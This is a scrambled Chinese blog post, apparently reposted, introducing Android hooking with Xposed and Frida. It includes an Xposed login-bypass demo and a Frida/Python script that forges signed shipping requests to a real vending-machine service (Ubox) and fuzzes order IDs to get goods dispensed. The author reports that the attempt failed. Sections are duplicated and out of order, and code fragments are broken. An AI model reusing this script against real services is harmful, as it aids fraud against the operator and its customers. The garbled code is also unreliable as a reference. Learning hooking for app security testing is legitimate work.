图片 10

浅谈android hook技术

运行

设备上运行frida-server:

图片 1

电脑上运行adb forward tcp转发:

27042端口用于与frida-server通信,之后的每个端口对应每个注入的进程。

运行如下命令验证是否成功安装:

$ frida-ps-R

正常情况应该输出进程列表如下:

图片 2

class ubox:def init:pass

安装

安装Frida非常简单,在pc端直接执行

pip install frida

即可

在Android设备需要导入frida的服务端,需要root你的手机

图片 3

1、抓取支付订单成功链接
postdata:sign=et09HgkvWcNc%252FTLe3E7Qj4j6MZEPbnm2zbCzJ3esTi0n6qo6T2RE6Qggh3rYytoTbKHGC1O3ghNPPZqoXSF%252FlzsRK2BnkLouKdZ%252BLnyZgdGrYgOyRv2piGOHnUwAhz5%252BUOWbH5ljMvNBgvTJwWsTy200bW2FAA%252BRkqNCn%252F4qIvo%253D&orderId=255601452×tamp=1472706588

反编译获取app中的核心函数

对于上面的js代码,其实就是调用app中的某个函数,比如sign值生成函数,加密解密函数,不需要自己单独的去分析算法流程,分析key值在哪,直接调用app的相应函数,让app帮我们完成这些工作。

这里我们分析的app是友宝,这是一款饮料售货机,当时抓包看到提货的时候是只有个订单id的,猜想是不是遍历订单的id,支付成功但是没有取货的订单会不会响应请求,自己掉货出来。

下面对友宝的订单进行分析过程

1.抓取支付订单成功链接

图片 4

分析:
sign是校验值,主要是防止订单伪造的,orderid是产生的支付订单id,这个主要是防止伪造用

2.反编译友宝app

找到morder/shipping所在的包为:com/ub/main/d/e.class

其中localStringBuffer存储的就是url中的参数信息,该请求查找到的代码在a()

生成签名的函数在com/ub/main/d/e.class中的b函数

最后加上sign值,发送请求

3.可以反编译出他的sign计算方法,也可以直接调用b函数来产生sign值,后来发现app会自动取时间戳,我们就不需要给他array型的参数

直接调用a函数,把orderId给他,让他直接return一个值出来就好了,就有了上面的js代码

  1. 自动化的批量处理

看代码

图片 5

构造了一个类,后面直接fuzz
uid就可以了,提取里面的sign值拼接到post数据中去。

可以产生的post请求和抓到的数据包的请求是完全一样的,但是并没有测试成功,分析原因有可能是订单id和用户的id有所绑定。

不过学习到了怎样通过frida对app进行分析。

}很简单的就是判断下用户输入的用户名和密码是正确,这里做个简单的演示,将用户输入的用户名和密码信息hook出来不管正确与否简单说下xposed模块的开发,首先需要的是导入api,具体的可以参考:
android:label=”xposed”><meta-dataandroid:name=”xposedmodule”android:value=”true”
/><meta-dataandroid:name=”xposeddescription”android:value=”hook
test”
/><meta-dataandroid:name=”xposedminversion”android:value=”82″
/></application>声明这个是xposed模块,名称为hook test
并且使用api版本号是82下面创建运行时候的hook代码:package
com.example.xposed;

Hook模块的编写

hook的主要模块是js编写的,利用javascript的api与server进行通信

下面结合一个真实例子进行简单的介绍,首先是测试代码:

图片 6

回调函数中比较重要的:beforeHookedMethod和afterHookedMethod,一个是在函数运行前劫持掉,一个是hook后放行,实例中对用户输入的字段进行劫持打印,后面将参数之改为正确登入用户名和密码,这样在app中输入任何字符都能登入成功

前言

private TextView accountView;private TextView passwdView;private Button loginBut;private Button quitBut;@Overrideprotected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); accountView =  findViewById(R.id.account); passwdView =  findViewById; loginBut =  findViewById(R.id.login); quitBut =  findViewById(R.id.quit); loginBut.setOnClickListener(new View.OnClickListener() { @Override public void onClick { String username = accountView.getText() + ""; String password = passwdView.getText() + ""; if(isCorrectInfo(username,password)){ Toast.makeText(MainActivity.this,"登入成功",Toast.LENGTH_LONG).show(); } else{ Toast.makeText(MainActivity.this,"登入失败",Toast.LENGTH_LONG).show;}public boolean isCorrectInfo(String username, String password) { if(username.equals && password.equals){ return true; } else{ return false; }}

简单实例

很简单的一个android登入代码:

图片 7

很简单的就是判断下用户输入的用户名和密码是正确,这里做个简单的演示,将用户输入的用户名和密码信息hook出来不管正确与否

简单说下xposed模块的开发,首先需要的是导入api,具体的可以参考:

在manifest中定义

图片 8

声明这个是xposed模块,名称为hook test 并且使用api版本号是82

下面创建运行时候的hook代码:

图片 9

看代码中的注释,主要是三个方法的调用,handleLoadPackage,主要是获取到android包的相关信息,这里由于只是对logintest进行hook,做下简单的判断。

findAndHookMethod
是主要的hook入口,里面几个参数分别为包名,classloader,hook的函数名,参数类型(这个比较容易出错,比如list类型写为List.class),回调函数

回调函数中比较重要的:beforeHookedMethod和afterHookedMethod,一个是在函数运行前劫持掉,一个是hook后放行,实例中对用户输入的字段进行劫持打印,后面将参数之改为正确登入用户名和密码,这样在app中输入任何字符都能登入成功

def on_message(message, data): #
反调函数,用来接受message的信息,message后面会说到try:print_result(message=message)except:pass

frida Hook框架

Frida是一款基于python + javascript
的hook框架,通杀androidioslinuxwinosx等各平台,由于是基于脚本的交互,因此相比xposed和substrace
cydia更加便捷,本文重点介绍Frida在android下面的使用。

Frida的官网为:

ub = ubox()ub.fuzzing(“255912964”)

复杂参数的hook

如果遇到函数的参数类型是数组、map、ArrayList类型的,首先目标MyClass类的fun1函数,声明如下:

图片 10

解决方法:

用Xposed自身提供的XposedHelpers的findClass方法加载每一个类,然后再将得到的类传递给hook函数作参数!

具体实现可参考链接,大牛讲的很清楚。

jscode = “”” #
核心代码,这段主要是调用app中的相应处理函数,后面会分析这段代码的来源

xposed框架

xposed,主页:

是个开源的框架,在github上有源码的,直接下载apk后安装激活就可以使用,很多地方有这方面的教程,针对不同的手机架构,有大牛做了针对性的修改。可以在论坛中进行搜索

通过替换/system/bin/app_process程序控制zygote进程,使得app_process在启动过程中会加载XposedBridge.jar这个jar包,从而完成对Zygote进程及其创建的Dalvik虚拟机的劫持。

Xposed在开机的时候完成对所有的Hook
Function的劫持,在原Function执行的前后加上自定义代码。

很多人将这个框架用在对android的私有化定制上面,其实在android安全测试方面这个框架提供了很大的便利,xposed主要是对方法的hook,在以往的重打包技术中,需要对smali代码的进行修改,修改起来比较麻烦。

利用xposed框架可以很容易的获取到android应用中的信息,比如加密私钥、salt值等等,不需要饭编译获取密钥转换算法、不需要了解密钥保存机制,直接hook函数,获取输入输出就可以。

// super.afterHookedMethod;XposedBridge.log(“劫持结束~~~~”);//
XposedBridge.log(“参数1:” + param.args[0]);//
XposedBridge.log(“参数2:” + param.args[1]);}});}

参考链接

http://bbs.pediy.com/showthread.php?t=202147&page=2

import frida, sys #引入frida类import logging

原理

在Android系统中,应用程序进程都是由Zygote进程孵化出来的,而Zygote进程是由Init进程启动的。Zygote进程在启动时会创建一个Dalvik虚拟机实例,每当它孵化一个新的应用程序进程时,都会将这个Dalvik虚拟机实例复制到新的应用程序进程里面去,从而使得每一个应用程序进程都有一个独立的Dalvik虚拟机实例。这也是Xposed选择替换app_process的原因。

Zygote进程在启动的过程中,除了会创建一个Dalvik虚拟机实例之外,还会将Java运行时库加载到进程中来,以及注册一些Android核心类的JNI方法来前面创建的Dalvik虚拟机实例中去。注意,一个应用程序进程被Zygote进程孵化出来的时候,不仅会获得Zygote进程中的Dalvik虚拟机实例拷贝,还会与Zygote一起共享Java运行时库。这也就是可以将XposedBridge这个jar包加载到每一个Android应用程序中的原因。XposedBridge有一个私有的Native(JNI)方法hookMethodNative,这个方法也在app_process中使用。这个函数提供一个方法对象利用Java的Reflection机制来对内置方法覆写。有能力的可以针对xposed的源码进行分析,不得不说,作者对于android的机制和java的了解已经相当深入了。

logging.basicConfig(filename=’test.log’, level=logging.INFO)

frida Hook框架Frida是一款基于python + javascript
的hook框架,通杀androidioslinuxwinosx等各平台,由于是基于脚本的交互,因此相比xposed和substrace
cydia更加便捷,本文重点介绍Frida在android下面的使用。Frida的官网为:

简单实例很简单的一个android登入代码:public class MainActivity extends
AppCompatActivity {

本文授权转载,作者:adrain

xposed框架

public class Main implements IXposedHookLoadPackage {//
包加载的时候回调public void handleLoadPackage(final
XC_LoadPackage.LoadPackageParam lpparam) throws Throwable
{//过滤掉不是com.example.logintest的应用if
(!lpparam.packageName.equals(“com.example.logintest”))return;XposedBridge.log(“加载应用:”

print process

import frida, sysimport loggingimport requests

反编译获取app中的核心函数对于上面的js代码,其实就是调用app中的某个函数,比如sign值生成函数,加密解密函数,不需要自己单独的去分析算法流程,分析key值在哪,直接调用app的相应函数,让app帮我们完成这些工作这里我们分析的app是友宝,这是一款饮料售货机,当时抓包看到提货的时候是只有个订单id的,猜想是不是遍历订单的id,支付成功但是没有取货的订单会不会响应请求,自己掉货出来下面对友宝的订单进行分析过程

Hook模块的编写hook的主要模块是js编写的,利用javascript的api与server进行通信下面结合一个真实例子进行简单的介绍,首先是测试代码:

您当前的位置: 安全博客 > 技术研究 > 浅谈android
hook技术浅谈android hook技术2017年03月17日 10:06
1249前言在测试android过程中,能对函数进行hook能帮助更加深入的进行测试,本文简单介绍了hook框架xposed和frida,从简单的小例子做了简单的演示,算是自己的学习的过程,是个入门的过程。

Zygote进程在启动的过程中,除了会创建一个Dalvik虚拟机实例之外,还会将Java运行时库加载到进程中来,以及注册一些Android核心类的JNI方法来前面创建的Dalvik虚拟机实例中去。注意,一个应用程序进程被Zygote进程孵化出来的时候,不仅会获得Zygote进程中的Dalvik虚拟机实例拷贝,还会与Zygote一起共享Java运行时库。这也就是可以将XposedBridge这个jar包加载到每一个Android应用程序中的原因。XposedBridge有一个私有的Native方法hookMethodNative,这个方法也在app_process中使用。这个函数提供一个方法对象利用Java的Reflection机制来对内置方法覆写。有能力的可以针对xposed的源码进行分析,不得不说,作者对于android的机制和java的了解已经相当深入了。

利用xposed框架可以很容易的获取到android应用中的信息,比如加密私钥、salt值等等,不需要反编译获取密钥转换算法、不需要了解密钥保存机制,直接hook函数,获取输入输出就可以。

构造了一个类,后面直接fuzz
uid就可以了,提取里面的sign值拼接到post数据中去可以产生的post请求和抓到的数据包的请求是完全一样的,但是并没有测试成功,分析原因有可能是订单id和用户的id有所绑定。不过学习到了怎样通过frida对app进行分析。

最后加上sign值,发送请求

logging.basicConfig(filename=’test.log’, level=logging.INFO)

原理在Android系统中,应用程序进程都是由Zygote进程孵化出来的,而Zygote进程是由Init进程启动的。Zygote进程在启动时会创建一个Dalvik虚拟机实例,每当它孵化一个新的应用程序进程时,都会将这个Dalvik虚拟机实例复制到新的应用程序进程里面去,从而使得每一个应用程序进程都有一个独立的Dalvik虚拟机实例。这也是Xposed选择替换app_process的原因。

def print_result: #对输出的信息进行打印print messagelogging.info

安全博客 > 技术研究 > 浅谈android hook技术

在Android设备需要导入frida的服务端,需要root你的手机$ curl -O
chmod+x
frida-server$ adb push frida-server /data/local/tmp/

reloadsys.setdefaultencoding

正常情况应该输出进程列表如下:PID NAME1590 com.facebook.katana13194
com.facebook.katana:providers12326 com.facebook.orca13282
com.twitter.android…

process =
frida.get_device_manager().enumerate_devices()[-1].attach(“com.ub.main”)
# 获取连接的设备并枚举取最后一个设备连接,并附到com.ub.main的进程上面

运行设备上运行frida-server:$ adb shellroot@android:/ # chmod 700
frida-server$ adb shellroot@android:/ # /data/local/tmp/frida-server -t
0 (注意在root下运行)

复杂参数的hook如果遇到函数的参数类型是数组、map、ArrayList类型的,首先目标MyClass类的fun1函数,声明如下:public
static boolean fun1(String[][] strAry, Map mp1,
Map<String,String> mp2, Map<Integer, String>
mp3,ArrayList<String> al1, ArrayList<Integer> al2, ArgClass
ac)

script = process.create_script #
调用相应的js函数,获取函数调用后的结果值script.on(‘message’,
on_message) # 利用回调,将message传递给on_message函数print
“done”script.load()

xposed,主页:

2、反编译友宝app找到morder/shipping所在的包为:com/ub/main/d/e.class其中localStringBuffer存储的就是url中的参数信息,该请求查找到的代码在a()StringBuffer
localStringBuffer = new
StringBuffer();localStringBuffer.append(“clientversion”);localStringBuffer.append;try{localStringBuffer.append(Uri.encode(this.e.getPackageManager().getPackageInfo(this.e.getPackageName.versionName));localStringBuffer.append;localStringBuffer.append(“machine_type”);localStringBuffer.append;localStringBuffer.append(Uri.encode(Build.MODEL));localStringBuffer.append;localStringBuffer.append;localStringBuffer.append;localStringBuffer.append(Uri.encode(Build.VERSION.RELEASE));localStringBuffer.append;localStringBuffer.append(“channel_id”);localStringBuffer.append;localStringBuffer.append(this.g.u;localStringBuffer.append;localStringBuffer.append(“device_no”);localStringBuffer.append;Object
localObject1 = “”;try{String str5 = Uri.encode(i.a;localObject1 =
str5;}catch (Exception localException1){Object localObject2;for
{}}localStringBuffer.appendlocalObject1);localStringBuffer.append;localStringBuffer.append;localStringBuffer.append;localObject2
= “”;try{String str4 = Uri.encode(i.b;localObject2 = str4;}catch
(Exception localException2){boolean bool;String str1;String str2;String
str3;for
{}}localStringBuffer.appendlocalObject2);localStringBuffer.append;localStringBuffer.append(“device_id”);localStringBuffer.append;localStringBuffer.append(Uri.encode;localStringBuffer.append;localStringBuffer.append;localStringBuffer.append;localStringBuffer.append(Uri.encode(this.f.c;localStringBuffer.append;localStringBuffer.append(“wake_id”);localStringBuffer.append;localStringBuffer.append;localStringBuffer.append;localStringBuffer.append(“net_type”);localStringBuffer.append;localStringBuffer.append(i.g;localStringBuffer.append;localStringBuffer.append(“carrier_type”);localStringBuffer.append;localStringBuffer.append(i.h;bool
= this.f.f();str1 = this.f.l();str2 = this.f.m();if {str3 =
“4”;l.a(“weipeipei”, “get参数—->isUboxAccount = ” + bool + “, s = ”
+
str3);localStringBuffer.append;localStringBuffer.append;localStringBuffer.append;localStringBuffer.append;return
localStringBuffer.toString;}}catch (PackageManager.NameNotFoundException
localNameNotFoundException){for
{localNameNotFoundException.printStackTrace();continue;if ((str1 !=
null) && (!str1.trim().equals {str3 = “2”;} else if ((str2 != null) &&
(!str2.trim().equals {str3 = “3”;} else {str3 =
“0”;}}}}生成签名的函数在com/ub/main/d/e.class中的b函数public String
b(String[][] paramArrayOfString)

解决方法:用Xposed自身提供的XposedHelpers的findClass方法加载每一个类,然后再将得到的类传递给hook函数作参数!

输入的是一个array上面的请求函数在:public String a(String
paramString){String[][] arrayOfString = new
String[2][];arrayOfString[0] = { “orderId”, paramString
};String[] arrayOfString1 = new String[2];arrayOfString1[0] =
“timestamp”;arrayOfString1[1] = d;arrayOfString[1] =
arrayOfString1;return b(arrayOfString);}

did = “255601452” # 订单idtime = “1472706588” # 时间戳

def request(self, payload): # print "requests" dict = {} url = "http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=41493965&wake_id=0&net_type=1&carrier_type=1&s=4" for i in payload.split: key = i.split[0] value = i.split[1] dict[key] = value data=dict r=requests.post(url=url,data=data) print r.textdef print_result(self, message): # print message payload = message["payload"] print payload self.requestdef on_message(self, message, data): self.print_result(message=message)def fuzzing(self, did): jscode = """ Dalvik.perform(function () { var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication(); var context = currentApplication.getApplicationContext(); var signclass = Dalvik.use("com.ub.main.d.e"); var signInstance=signclass.$new; var sign=signInstance.a; send; """ % did # print jscode process = frida.get_device_manager().enumerate_devices()[-1].attach("com.ub.main") # print process script = process.create_script script.on('message', self.on_message) # print "done" script.load() # sys.stdin.read()

3、可以反编译出他的sign计算方法,也可以直接调用b函数来产生sign值,后来发现app会自动取时间戳,我们就不需要给他array型的参数,直接调用a函数,把orderId给他,让他直接return一个值出来就好了,就有了上面的js代码

Dalvik.perform(function () { # 说明是Dalvik平台var currentApplication =
Dalvik.use(“android.app.ActivityThread”).currentApplication();var
context = currentApplication.getApplicationContext();var signclass =
Dalvik.use(“com.ub.main.d.e”);# 调用com.ub.main.d.e类var
signInstance=signclass.$new; # 反射创建一个新的对象var
sign=signInstance.a(“255601452″); #调用对象的a函数send;
#将调用函数的结果发送出来});”””

参考链接:

import java.util.List;

Xposed在开机的时候完成对所有的Hook
Function的劫持,在原Function执行的前后加上自定义代码,很多人将这个框架用在对android的私有化定制上面,其实在android安全测试方面这个框架提供了很大的便利,xposed主要是对方法的hook,在以往的重打包技术中,需要对smali代码的进行修改,修改起来比较麻烦。

  • lpparam.packageName);

    // Hook MainActivity 中的判断方法 findAndHookMethod(“com.example.logintest.MainActivity”, lpparam.classLoader, “isCorrectInfo”, String.class,String.class new XC_MethodHook() { @Override protected void beforeHookedMethod(MethodHookParam param) throws Throwable { super.beforeHookedMethod; // XposedBridge.log(“开始劫持~~”); // XposedBridge.log(“参数1:” + param.args[0]); XposedBridge.log(“参数2:” + param.args[1]); XposedBridge.log(“修改登入数据~~”);// 修改为正确的用户名密码 param.args[0]=”admin”; param.args[1]=”passwd”; } @Override protected void afterHookedMethod(MethodHookParam param) throws Throwable {

reloadsys.setdefaultencoding #对输出进行utf8的编码print
sys.getdefaultencoding()

电脑上运行adb forward tcp转发:adb forward tcp:27042 tcp:27042adb forward
tcp:27043 tcp:27043

}看代码中的注释,主要是三个方法的调用,handleLoadPackage,主要是获取到android包的相关信息,这里由于只是对logintest进行hook,做下简单的判断。

分析:sign是校验值,主要是防止订单伪造的,orderid是产生的支付订单id,这个主要是防止伪造用

4、自动化的批量处理看代码

安装安装Frida非常简单,在pc端直接执行pip install frida即可

findAndHookMethod
是主要的hook入口,里面几个参数分别为包名,classloader,hook的函数名,参数类型(这个比较容易出错,比如list类型写为List.class),回调函数

import de.robv.android.xposed.IXposedHookLoadPackage;import
de.robv.android.xposed.XC_MethodHook;import
de.robv.android.xposed.XposedBridge;import
de.robv.android.xposed.callbacks.XC_LoadPackage;

import static de.robv.android.xposed.XposedHelpers.findAndHookMethod;

27042端口用于与frida-server通信,之后的每个端口对应每个注入的进程.运行如下命令验证是否成功安装:$
frida-ps-R

发表评论

电子邮件地址不会被公开。 必填项已用*标注